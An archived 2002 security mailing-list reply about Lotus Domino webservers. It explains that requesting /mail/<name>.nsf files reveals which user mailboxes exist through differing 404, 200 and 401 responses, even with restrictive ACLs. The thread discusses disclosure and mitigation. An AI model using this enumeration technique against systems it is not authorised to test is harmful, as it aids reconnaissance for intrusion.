Re: Script for find domino's users

From: David Litchfield (davidat_private)
Date: Mon Feb 04 2002 - 08:28:31 PST

Next message: Kevin Day: "Re: Buffer overflow in mIRC allowing arbitary code to be executed."

Previous message: Lex de Heer: "Re: Re:ICQ Bug possibly?"
In reply to: nicobat_private: "Re: Script for find domino's users"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>
> >Two things can be done to avoid this :
> >
> >1 - Change the ACL on sensitive databases ( /mail/* , names.nsf ) to :
> >      Anonymous - No access
> >      [Default] - No access
>
> In my opinion, a Domino webserver configured with these ACLs still allows
enumeration of
> valid users.
>
> If you try to GET a file named /mail/toto.nsf :
> - toto doesn't exist => 404
> - toto exists => redirection to the login page ("200 OK")
>
> I'm not aware of any ACL configuration which forbid this behaviour.

If you've configured the Domino server to use form based logins/cookies
you'll get a 200 response. Else you'll get a 401 Unauthorized.
Either way you can still determine if the .nsf or .box file exists.
Cheers,
David Litchfield
http://www.ngssoftware.com/

Next message: Kevin Day: "Re: Buffer overflow in mIRC allowing arbitary code to be executed."
Previous message: Lex de Heer: "Re: Re:ICQ Bug possibly?"
In reply to: nicobat_private: "Re: Script for find domino's users"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Feb 04 2002 - 17:33:43 PST